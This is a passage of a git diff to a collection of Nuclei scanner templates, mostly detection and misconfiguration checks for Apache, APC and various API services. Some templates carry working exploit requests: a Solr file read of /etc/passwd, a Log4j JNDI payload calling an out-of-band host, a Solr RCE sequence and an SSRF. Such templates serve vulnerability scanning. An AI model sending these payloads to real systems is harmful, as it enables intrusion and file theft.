shodan-query: http.title:"Mesos" + vendor: apache + verified: true tags: panel,apache,mesos -requests: +http: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}:5050" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -34,5 +38,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/31 +# digest: 4b0a00483046022100f9ad35c3dfc30dcfd03d982738cf7fc2177db2271595789a62aeadecfdc646b2022100bb27c79a50dd8db5a5a9423a629e2166c4757ea8e9962a89028005b0454d20b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apache-nifi-unauth.yaml b/nuclei-templates/Other/apache-nifi-unauth.yaml new file mode 100644 index 0000000000..97c3191b56 --- /dev/null +++ b/nuclei-templates/Other/apache-nifi-unauth.yaml @@ -0,0 +1,43 @@ +id: apache-nifi-unauth + +info: + name: Apache NiFi - Unauthenticated Access + author: pwnhxl + severity: high + description: | + Apache NiFi server was able to be accessed because no authentication was required. + reference: | + - https://github.com/jm0x0/apache_nifi_processor_rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L + cvss-score: 8.6 + cwe-id: CWE-285 + metadata: + verified: true + max-request: 1 + shodan-query: title:"NiFi" + fofa-query: title="nifi" && body="Did you mean" + tags: misconfig,apache,nifi,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/nifi-api/access/config" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"supportsLogin":false}' + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + +# digest: 490a0046304402200263b216fb88659a3d69fd4b16ac40ea371468ab1eaaa10994736d75f7a0251d022048f8a0fa83b268c2949703b34a5f159f00fd208bbeed1b1ca1c9574457c3dcdb:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/apache-rocketmq-broker-unauth.yaml b/nuclei-templates/Other/apache-rocketmq-broker-unauth.yaml index 7e41f8fbc0..548ceb290d 100644 --- a/nuclei-templates/Other/apache-rocketmq-broker-unauth.yaml +++ b/nuclei-templates/Other/apache-rocketmq-broker-unauth.yaml @@ -10,7 +10,7 @@ info: - https://rocketmq.apache.org/docs/bestPractice/03access metadata: fofa-query: protocol="rocketmq" - max-request: 2 + max-request: 1 shodan-query: title:"RocketMQ" verified: true tags: network,rocketmq,broker,apache,unauth,misconfig @@ -22,23 +22,22 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:10911" + port: 10911 read-size: 2048 matchers-condition: and matchers: - - type: word - words: - - serializeTypeCurrentRPC - - language - - opaque - - version - condition: and - - type: word - words: - - denied - - Bad request - - HTTP/1.1 - - 400 - condition: or - negative: true \ No newline at end of file + - type: word + words: + - serializeTypeCurrentRPC + - language + - opaque + - version + condition: and + + - type: word + words: + - "HTTP" + - "FTP" + negative: true +# digest: 490a00463044022047caf8ef37a3c31f120635dab95c1e57db0a0c80a9f44a563f77e45b5fc9d4670220123bbc8168d521dc2e99cb0d03c60f343b294c98591a3d2b88de4b415479e505:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apache-solr-file-read-368.yaml b/nuclei-templates/Other/apache-solr-file-read-368.yaml new file mode 100644 index 0000000000..56a6ada58d --- /dev/null +++ b/nuclei-templates/Other/apache-solr-file-read-368.yaml @@ -0,0 +1,44 @@ +id: apache-solr-file-read + +info: + name: Apache Solr <= 8.8.1 Arbitrary File Read + author: DhiyaneshDk + severity: high + tags: apache,solr,lfi + reference: + - https://twitter.com/Al1ex4/status/1382981479727128580 + - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ + - https://twitter.com/sec715/status/1373472323538362371 + +requests: + - raw: + - | + GET /solr/admin/cores?wt=json HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Connection: close + + - | + GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Connection: close + + + extractors: + - type: regex + internal: true + name: core + group: 1 + regex: + - '"name"\:"(.*?)"' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + regex: + - "root:.*:0:0:" \ No newline at end of file diff --git a/nuclei-templates/Other/apache-solr-log4j-CVE-2021-44228.yaml b/nuclei-templates/Other/apache-solr-log4j-cve-2021-44228.yaml similarity index 100% rename from nuclei-templates/Other/apache-solr-log4j-CVE-2021-44228.yaml rename to nuclei-templates/Other/apache-solr-log4j-cve-2021-44228.yaml diff --git a/nuclei-templates/Other/apache-solr-log4j-rce.yaml b/nuclei-templates/Other/apache-solr-log4j-rce.yaml index bd31144333..9a19f69c70 100644 --- a/nuclei-templates/Other/apache-solr-log4j-rce.yaml +++ b/nuclei-templates/Other/apache-solr-log4j-rce.yaml @@ -1,5 +1,4 @@ id: apache-solr-log4j-rce - info: name: Apache Solr Log4j JNDI RCE author: Evan Rubinstein,nvn1729 @@ -10,27 +9,23 @@ info: - https://twitter.com/sirifu4k1/status/1470011568834424837 - https://github.com/apache/solr/pull/454 tags: solr,oast,log4j,rce,apache,jndi - requests: - method: GET path: - "{{BaseURL}}/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.{{interactsh-url}}/a%7D" - matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - - type: regex part: interactsh_request regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - extractors: - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/nuclei-templates/Other/apache-solr-rce.yaml b/nuclei-templates/Other/apache-solr-rce.yaml index f8fe789fb9..50dc1e4984 100644 --- a/nuclei-templates/Other/apache-solr-rce.yaml +++ b/nuclei-templates/Other/apache-solr-rce.yaml @@ -4,9 +4,12 @@ info: name: Apache Solr 9.1 - Remote Code Execution author: j4vaovo severity: critical + description: Apache Solr 9.1 is vulnerable to RCE. reference: - https://web.archive.org/web/20230414152023/https://noahblog.360.cn/apache-solr-rce/ - tags: solr,apache,rce,oast + metadata: + max-request: 2 + tags: solr,apache,rce,oast,intrusive http: - raw: @@ -16,13 +19,10 @@ http: Content-Type: application/json { "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}} - - | POST /solr/gettingstarted_shard2_replica_n1/debug/dump?param=ContentStreams HTTP/1.1 Host: {{Hostname}} - Accept: */* Content-Type: multipart/form-data; boundary=------------------------5897997e44b07bf9 - Connection: close --------------------------5897997e44b07bf9 Content-Disposition: form-data; name="stream.url" @@ -41,3 +41,4 @@ http: part: interactsh_request words: - "User-Agent: Java" +# digest: 4a0a00473045022100cb3600463572b923e6f4b47d3f8261b25d16d9795667a1f35875aeba097a8e1f0220576af9325702029aab5e4f16c5d99033f591da500368f8b04e416bc588e69a10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apache-streampipes-detect.yaml b/nuclei-templates/Other/apache-streampipes-detect.yaml index b6ac0df344..8f86267b1b 100644 --- a/nuclei-templates/Other/apache-streampipes-detect.yaml +++ b/nuclei-templates/Other/apache-streampipes-detect.yaml @@ -1,39 +1,39 @@ -id: apache-streampipes-detect - -info: - name: Apache StreamPipes - Detect - author: Alessandro Albani - DEVisions - severity: info - description: | - Checks for the presence of Apache StreamPipes by looking in the body or matching the favicon hash. - metadata: - max-request: 3 - verified: true - shodan-query: title:"apache streampipes" - fofa-query: title="apache streampipes" - tags: tech,apache,streampipes,detect - -http: - - method: GET - path: - - '{{BaseURL}}/streampipes-backend/api/openapi.json' - - '{{BaseURL}}/assets/img/favicon/favicon.ico' - - '{{BaseURL}}' - - host-redirects: true - max-redirects: 2 - stop-at-first-match: true - - matchers: - - type: dsl - dsl: - - contains_any(to_lower(body), "apache streampipes", "apache streampipes api") - - status_code==200 && ("1937041138" == mmh3(base64_py(body)) || "480680877" == mmh3(base64_py(body))) - condition: or - - extractors: - - type: json - part: body - group: 1 - json: - - '.info.version' +id: apache-streampipes-detect + +info: + name: Apache StreamPipes - Detect + author: Alessandro Albani - DEVisions + severity: info + description: | + Checks for the presence of Apache StreamPipes by looking in the body or matching the favicon hash. + metadata: + max-request: 3 + verified: true + shodan-query: title:"apache streampipes" + fofa-query: title="apache streampipes" + tags: tech,apache,streampipes,detect + +http: + - method: GET + path: + - '{{BaseURL}}/streampipes-backend/api/openapi.json' + - '{{BaseURL}}/assets/img/favicon/favicon.ico' + - '{{BaseURL}}' + + host-redirects: true + max-redirects: 2 + stop-at-first-match: true + + matchers: + - type: dsl + dsl: + - contains_any(to_lower(body), "apache streampipes", "apache streampipes api") + - status_code==200 && ("1937041138" == mmh3(base64_py(body)) || "480680877" == mmh3(base64_py(body))) + condition: or + + extractors: + - type: json + part: body + group: 1 + json: + - '.info.version' diff --git a/nuclei-templates/Other/apache-struts-showcase.yaml b/nuclei-templates/Other/apache-struts-showcase.yaml index deed9ebd88..0a240c3195 100644 --- a/nuclei-templates/Other/apache-struts-showcase.yaml +++ b/nuclei-templates/Other/apache-struts-showcase.yaml @@ -4,20 +4,23 @@ info: name: Apache Struts - ShowCase Application Exposure author: DhiyaneshDK severity: low + description: Apache Structs ShowCase Application is exposed. reference: - https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/ApacheStrutsWebConsole.java metadata: - verified: "true" + verified: true + max-request: 2 shodan-query: title:"Struts2 Showcase" tags: apache,struts,showcase,misconfig,exposure -requests: +http: - method: GET path: - '{{BaseURL}}' - '{{BaseURL}}/struts2-showcase/showcase.action' stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -28,3 +31,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100bd7f7b423bdd7d05868d8f1d47733eb40b471785b26564871538af7feb86839f022043022c33d92e6e55425a6b5e0066b736116a66816970b6d9c28d4f4731010799:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apache-tomcat-CVE-2022-34305.yaml b/nuclei-templates/Other/apache-tomcat-cve-2022-34305.yaml similarity index 100% rename from nuclei-templates/Other/apache-tomcat-CVE-2022-34305.yaml rename to nuclei-templates/Other/apache-tomcat-cve-2022-34305.yaml diff --git a/nuclei-templates/Other/apache-tomcat-snoop-ip-disclosure.yaml b/nuclei-templates/Other/apache-tomcat-snoop-ip-disclosure.yaml index 8ffda98982..e72cd07eb1 100644 --- a/nuclei-templates/Other/apache-tomcat-snoop-ip-disclosure.yaml +++ b/nuclei-templates/Other/apache-tomcat-snoop-ip-disclosure.yaml @@ -1,23 +1,19 @@ id: apache-tomcat-snoop-Internal-IP-disclosure - info: name: Apache Tomcat example - snoop - Internal IP disclosure author: wasp76b severity: low reference: https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks tags: apache,misconfig,tomcat,disclosure - requests: - method: GET path: - "{{BaseURL}}/examples/servlets/servlet/RequestHeaderExample" - matchers-condition: and matchers: - type: word words: - 'Request Header Example' - - type: status status: - 200 diff --git a/nuclei-templates/Other/apachesolrlfissrf.yaml b/nuclei-templates/Other/apachesolrlfissrf.yaml new file mode 100644 index 0000000000..7d28fe62e8 --- /dev/null +++ b/nuclei-templates/Other/apachesolrlfissrf.yaml @@ -0,0 +1,47 @@ +id: CVE-2021-27905 + +info: + name: Apache Solr <= 8.8.1 SSRF + author: hackergautam + severity: critical + tags: cve,cve2021,apache,solr,ssrf + description: The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2. + reference: + - https://www.anquanke.com/post/id/238201 + - https://ubuntu.com/security/CVE-2021-27905 + - https://nvd.nist.gov/vuln/detail/CVE-2021-27905 + - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-27905 + cwe-id: CWE-918 + +requests: + - raw: + - | + GET /solr/admin/cores?wt=json HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Connection: close + + - | + GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://example.com HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Connection: close + + + extractors: + - type: regex + internal: true + name: core + group: 1 + regex: + - '"name"\:"(.*?)"' + + matchers: + - type: word + words: + - '<str name="status">OK</str>' + part: body \ No newline at end of file diff --git a/nuclei-templates/Other/apc-info-379.yaml b/nuclei-templates/Other/apc-info-379.yaml deleted file mode 100644 index 0fc35742be..0000000000 --- a/nuclei-templates/Other/apc-info-379.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: apcu-service - -info: - name: APCu service information leakage - author: koti2 - severity: low - tags: config,service,apcu - -requests: - - method: GET - path: - - "{{BaseURL}}/apc/apc.php" - - "{{BaseURL}}/apc.php" - - stop-at-first-match: true - matchers: - - type: word - words: - - "APCu Version Information" - - "General Cache Information" - - "Detailed Memory Usage and Fragmentation" - condition: or diff --git a/nuclei-templates/Other/apc-ups-login-381.yaml b/nuclei-templates/Other/apc-ups-login-381.yaml new file mode 100644 index 0000000000..46722d9e73 --- /dev/null +++ b/nuclei-templates/Other/apc-ups-login-381.yaml @@ -0,0 +1,25 @@ +id: apc-ups-login + +info: + name: APC UPS Login + author: droberson + severity: info + reference: + - https://www.shodan.io/search?query=title%3A%22APC+%7C+Log+On%22 + tags: iot,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/logon.htm" + + matchers-condition: and + matchers: + - type: word + words: + - '<title>APC | Log On' + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/apc-ups-login-382.yaml b/nuclei-templates/Other/apc-ups-login-382.yaml deleted file mode 100644 index f28e384f2c..0000000000 --- a/nuclei-templates/Other/apc-ups-login-382.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: apc-ups-login - -info: - name: APC UPS Login - author: droberson - severity: info - reference: https://www.shodan.io/search?query=title%3A%22APC+%7C+Log+On%22 - tags: iot,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/logon.htm" - - matchers-condition: and - matchers: - - type: word - words: - - 'APC | Log On' - part: body - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/apc_info.yaml b/nuclei-templates/Other/apc_info.yaml new file mode 100644 index 0000000000..cd1534ba4c --- /dev/null +++ b/nuclei-templates/Other/apc_info.yaml @@ -0,0 +1,19 @@ +id: apcu-service + +info: + name: APCu service information leakage + author: koti2 + severity: low + +requests: + - method: GET + path: + - "{{BaseURL}}/apc/apc.php" + - "{{BaseURL}}/apc.php" + matchers: + - type: word + words: + - "APCu Version Information" + - "General Cache Information" + - "Detailed Memory Usage and Fragmentation" + condition: or diff --git a/nuclei-templates/Other/apdisk-disclosure.yaml b/nuclei-templates/Other/apdisk-disclosure.yaml index 3d412ce36c..3d6c933681 100644 --- a/nuclei-templates/Other/apdisk-disclosure.yaml +++ b/nuclei-templates/Other/apdisk-disclosure.yaml @@ -4,6 +4,7 @@ info: name: Apdisk - File Disclosure author: DhiyaneshDk severity: low + description: Apdisk internal file is exposed. reference: - https://discussions.apple.com/thread/250354761 metadata: @@ -31,5 +32,4 @@ http: part: header words: - "text/xml" - -# digest: 4a0a0047304502203c433e233f175fbb028579eea7f7c6a6e2ebb21d40a15da47b79fb051f704422022100c044da0afa9f1168132de6724299268525aaa4878271b95169b07a3fb5c8d59e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e4a95dba16af6f8a6af5cd619c33f3f4ec5e1bf41b53fccab5a9844d71e54546022013b09064dcb5475915172199a571f7ac0ccb5c707ef1d1eca5513fdf5bd7d31c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apeosport-v_c3375.yaml b/nuclei-templates/Other/apeosport-v_c3375.yaml new file mode 100644 index 0000000000..f1158ac5aa --- /dev/null +++ b/nuclei-templates/Other/apeosport-v_c3375.yaml @@ -0,0 +1,21 @@ +id: apeosport-v_c3375 +info: + name: apeosport-v_c3375 + author: cn-kali-team + tags: detect,tech,apeosport-v_c3375 + severity: info + metadata: + fofa-query: + - '"prop.htm" && "docucentre"' + product: apeosport-v_c3375 + vendor: fujixerox + verified: true +http: +- method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - docucentre + - prop.htm diff --git a/nuclei-templates/Other/Apereo-Cas-rce.yaml b/nuclei-templates/Other/apereo-cas-rce.yaml similarity index 100% rename from nuclei-templates/Other/Apereo-Cas-rce.yaml rename to nuclei-templates/Other/apereo-cas-rce.yaml diff --git a/nuclei-templates/Other/api-1forge.yaml b/nuclei-templates/Other/api-1forge.yaml index 8f61810207..f679578aaa 100644 --- a/nuclei-templates/Other/api-1forge.yaml +++ b/nuclei-templates/Other/api-1forge.yaml @@ -4,13 +4,17 @@ info: name: 1Forge API Test author: daffainfo severity: info + description: Forex currency market data reference: - https://1forge.com/api - - https://github.com/daffainfo/all-about-apikey/blob/main/Currency%20Exchange/1Forge.md + - https://github.com/daffainfo/all-about-apikey/tree/main/1forge + metadata: + max-request: 1 tags: token-spray,1forge self-contained: true -requests: + +http: - method: GET path: - "https://api.1forge.com/quota?api_key={{token}}" @@ -23,3 +27,5 @@ requests: - '"quota_limit":' - '"quota_remaining":' condition: and + +# digest: 490a0046304402206e75f7e411aaad09158fd836607dca69948f5b02f37e6cadcdb29530c1e8f62002207c8621d83853143346ae1a43f25a1c25dfa0320d70459315b2a95ae2b6b68eed:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstract-company-enrichment.yaml b/nuclei-templates/Other/api-abstract-company-enrichment.yaml index 4b84a4367e..051e56cba9 100644 --- a/nuclei-templates/Other/api-abstract-company-enrichment.yaml +++ b/nuclei-templates/Other/api-abstract-company-enrichment.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.abstractapi.com/api/company-enrichment - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-company-enrichment + metadata: + max-request: 1 tags: token-spray,abstractapi self-contained: true -requests: + +http: - method: GET path: - "https://companyenrichment.abstractapi.com/v1/?api_key={{token}}&domain=airbnb.com" @@ -24,3 +27,5 @@ requests: - '"domain":' - '"year_founded":' condition: and + +# digest: 490a0046304402201b8b696a2960ec01a0ceab0b1606223c37eedea80d0e2b8d0412a999227023f302205c8e2c51ff3f05b2b101b3b28b7f12aed9047ae1f3f310c02c2b1f9cdd124b30:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstract-email-validation.yaml b/nuclei-templates/Other/api-abstract-email-validation.yaml index 145e4a97de..3de502fd7b 100644 --- a/nuclei-templates/Other/api-abstract-email-validation.yaml +++ b/nuclei-templates/Other/api-abstract-email-validation.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.abstractapi.com/api/email-verification-validation-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-email-validation + metadata: + max-request: 1 tags: token-spray,abstractapi self-contained: true -requests: + +http: - method: GET path: - "https://emailvalidation.abstractapi.com/v1/?api_key={{token}}&email=johnsmith@gmail.com" @@ -24,3 +27,5 @@ requests: - '"autocorrect":' - '"is_valid_format":' condition: and + +# digest: 4b0a00483046022100f9238bdf7a8d3c47066e7c986b940477e934daa9e1fea3038b8b3cf662f0d53e022100c7403ea05d7d218a713a6da3acc35d1f29ada92dbd4b451988803e50ea0e14df:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstract-exchange-rates.yaml b/nuclei-templates/Other/api-abstract-exchange-rates.yaml index 4a0f81a277..1dc879c9d8 100644 --- a/nuclei-templates/Other/api-abstract-exchange-rates.yaml +++ b/nuclei-templates/Other/api-abstract-exchange-rates.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.abstractapi.com/api/exchange-rate-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-exchange-rates + metadata: + max-request: 1 tags: token-spray,abstractapi self-contained: true -requests: + +http: - method: GET path: - "https://exchange-rates.abstractapi.com/v1/live/?api_key={{token}}&base=USD" @@ -24,3 +27,5 @@ requests: - '"last_updated":' - '"exchange_rate":' condition: and + +# digest: 490a0046304402201ce9c7e456983fff96fe77945768ed8bc846a5dd6e24464cea00dd45ab71c5db02203785bd67fa3224bf0be21b162f8deb8ed8c2226bb70ec8a79dd74f5e24dada4f:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstract-iban-validation.yaml b/nuclei-templates/Other/api-abstract-iban-validation.yaml index b605fcc7d4..b0f02b0e78 100644 --- a/nuclei-templates/Other/api-abstract-iban-validation.yaml +++ b/nuclei-templates/Other/api-abstract-iban-validation.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.abstractapi.com/api/iban-validation - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-iban-validation + metadata: + max-request: 1 tags: token-spray,abstractapi self-contained: true -requests: + +http: - method: GET path: - "https://ibanvalidation.abstractapi.com/v1/?api_key={{token}}&iban=BE71096123456769" @@ -23,3 +26,5 @@ requests: - '"iban":' - '"is_valid":' condition: and + +# digest: 490a00463044022028824c8b52ccf841d69daffc23f19103050a26b873e48defc9c35ee308338d330220172c39ddcdb8053f54f534bb2ea2fe00c5d0b18b3457748cbc18d2522f3e555b:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstract-image-processing.yaml b/nuclei-templates/Other/api-abstract-image-processing.yaml index ee0815c59a..a42f30e1b3 100644 --- a/nuclei-templates/Other/api-abstract-image-processing.yaml +++ b/nuclei-templates/Other/api-abstract-image-processing.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.abstractapi.com/api/image-processing-optimization-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-image-processing + metadata: + max-request: 1 tags: token-spray,abstractapi self-contained: true -requests: + +http: - raw: - | POST https://images.abstractapi.com/v1/url/ HTTP/1.1 @@ -29,3 +32,5 @@ requests: - '"original_height":' - '"original_width":' condition: and + +# digest: 4a0a00473045022100bce21626b0148733684cdc0d6c67014c141c37ec66367e204b75af99cd447d3302203470f8e31c59957cc63f31a45fd786871ba62cd71fb5a9eb33c046ba6f2fbc9f:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstract-ip-geolocation.yaml b/nuclei-templates/Other/api-abstract-ip-geolocation.yaml index 63227eb94e..6427139d9f 100644 --- a/nuclei-templates/Other/api-abstract-ip-geolocation.yaml +++ b/nuclei-templates/Other/api-abstract-ip-geolocation.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.abstractapi.com/api/ip-geolocation-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-ip-geolocation + metadata: + max-request: 1 tags: token-spray,abstractapi self-contained: true -requests: + +http: - method: GET path: - "https://ipgeolocation.abstractapi.com/v1/?api_key={{token}}&ip_address=92.184.105.98" @@ -24,3 +27,5 @@ requests: - '"city":' - '"city_geoname_id":' condition: and + +# digest: 4a0a0047304502210093c0c54eb701f62ed392cdf7bce0b061812ff0e962b3e49e475ff233d337855c0220426668d40d558b35cc59b3675ea073d052474a39bc2907b28593e011431d2a81:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstract-phone-validation.yaml b/nuclei-templates/Other/api-abstract-phone-validation.yaml index 25f3807509..5773f0b5f2 100644 --- a/nuclei-templates/Other/api-abstract-phone-validation.yaml +++ b/nuclei-templates/Other/api-abstract-phone-validation.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.abstractapi.com/api/phone-validation-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-phone-validation + metadata: + max-request: 1 tags: token-spray,abstractapi self-contained: true -requests: + +http: - method: GET path: - "https://phonevalidation.abstractapi.com/v1/?api_key={{token}}&number=14154582468" @@ -24,3 +27,5 @@ requests: - '"is_valid_number":' - '"local_format":' condition: and + +# digest: 4a0a00473045022100d8ce8053c54d7ef1d316ce23f672a6af9ec81b27c19f6bd811b2814339c27656022054ec975a8b0dc1b373400c7d287fc7d0e89823f8e55c678ae68cd19f02ff1543:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstract-public-holidays.yaml b/nuclei-templates/Other/api-abstract-public-holidays.yaml index 52102f98ea..491daac1b6 100644 --- a/nuclei-templates/Other/api-abstract-public-holidays.yaml +++ b/nuclei-templates/Other/api-abstract-public-holidays.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.abstractapi.com/api/holidays-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-public-holidays + metadata: + max-request: 1 tags: token-spray,abstractapi self-contained: true -requests: + +http: - method: GET path: - "https://holidays.abstractapi.com/v1/?api_key={{token}}&country=GB&year=2021&month=1&day=25" @@ -24,3 +27,5 @@ requests: - '"location":' - '"date_year":' condition: and + +# digest: 4b0a00483046022100ea5b0aa189cd62224c43a68e2eabd42550c8043792570b97abc4af209c8987ca022100b28e1f8335e5be248692138bdd9976809da4ec8f7283d5c088ad719791f1f0f6:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstract-timezone.yaml b/nuclei-templates/Other/api-abstract-timezone.yaml index e3baf9d1f1..384a781ac4 100644 --- a/nuclei-templates/Other/api-abstract-timezone.yaml +++ b/nuclei-templates/Other/api-abstract-timezone.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.abstractapi.com/api/time-date-timezone-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-timezone + metadata: + max-request: 1 tags: token-spray,abstractapi self-contained: true -requests: + +http: - method: GET path: - "https://timezone.abstractapi.com/v1/current_time/?api_key={{token}}&location=Oxford,%20United%20Kingdom" @@ -24,3 +27,5 @@ requests: - '"longitude":' - '"latitude":' condition: and + +# digest: 4a0a004730450220404fa80dd4ee2544eb2c809d7b5defa8ec9c1f60c6ef99c88a620bf8cc8d2e82022100a03fbfdaa510280c8b14069a6deefa4ca22c35db4007a3750b98c0ceaa034cc1:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstract-user-avatars.yaml b/nuclei-templates/Other/api-abstract-user-avatars.yaml index 55c54f4042..a171ab492b 100644 --- a/nuclei-templates/Other/api-abstract-user-avatars.yaml +++ b/nuclei-templates/Other/api-abstract-user-avatars.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.abstractapi.com/api/user-avatar-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-user-avatars + metadata: + max-request: 1 tags: token-spray,abstractapi self-contained: true -requests: + +http: - method: GET path: - "https://avatars.abstractapi.com/v1/?api_key={{token}}&name=example" @@ -21,3 +24,5 @@ requests: part: header words: - 'image/png' + +# digest: 4b0a00483046022100a850948b132b01d73b020fcd8ec6753da6f6ebe5a230a480b37b9c82b66ee3d6022100a260133eb09434bb302d4210823f3738229d48948420031388d67a7d5aa3ed3a:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstract-vat-validation-rates.yaml b/nuclei-templates/Other/api-abstract-vat-validation-rates.yaml index 7f14dbe89d..625f9742db 100644 --- a/nuclei-templates/Other/api-abstract-vat-validation-rates.yaml +++ b/nuclei-templates/Other/api-abstract-vat-validation-rates.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.abstractapi.com/api/vat-validation-rates-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-vat-validation-rates + metadata: + max-request: 1 tags: token-spray,abstractapi self-contained: true -requests: + +http: - method: GET path: - "https://vat.abstractapi.com/v1/?api_key={{token}}&vat_number=SE556656688001" @@ -24,3 +27,5 @@ requests: - '"is_vat_valid":' - '"company_name":' condition: and + +# digest: 4a0a0047304502204ffd02a9e9ea07047be3f88fd5e53dddaf32935ef4476c4a46e53e998a21f1d1022100890deb736e6ae51d591f611e0007ddf73f31a947a33520b98d8218bcb2b43fe0:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstract-website-scraping.yaml b/nuclei-templates/Other/api-abstract-website-scraping.yaml index b0531d28a3..4dd68b5f5a 100644 --- a/nuclei-templates/Other/api-abstract-website-scraping.yaml +++ b/nuclei-templates/Other/api-abstract-website-scraping.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.abstractapi.com/api/web-scraping-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-website-scraping + metadata: + max-request: 1 tags: token-spray,abstractapi self-contained: true -requests: + +http: - method: GET path: - "https://scrape.abstractapi.com/v1/?api_key={{token}}&url=https://test.test" @@ -23,3 +26,5 @@ requests: - '"code":"validation_error"' - 'Reached error page' condition: and + +# digest: 490a00463044022009c985d563aad9ed09afb6b4b207d237534040eb35c6ba26a6cd7fad6525807f022013773c8d17adc1027bef5157fbcfe8ebfdeaa34ba83e37137db5f51dc6327dc4:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstract-website-screenshot.yaml b/nuclei-templates/Other/api-abstract-website-screenshot.yaml index 8c44c52c6f..0b11fd13c2 100644 --- a/nuclei-templates/Other/api-abstract-website-screenshot.yaml +++ b/nuclei-templates/Other/api-abstract-website-screenshot.yaml @@ -8,10 +8,13 @@ info: reference: - 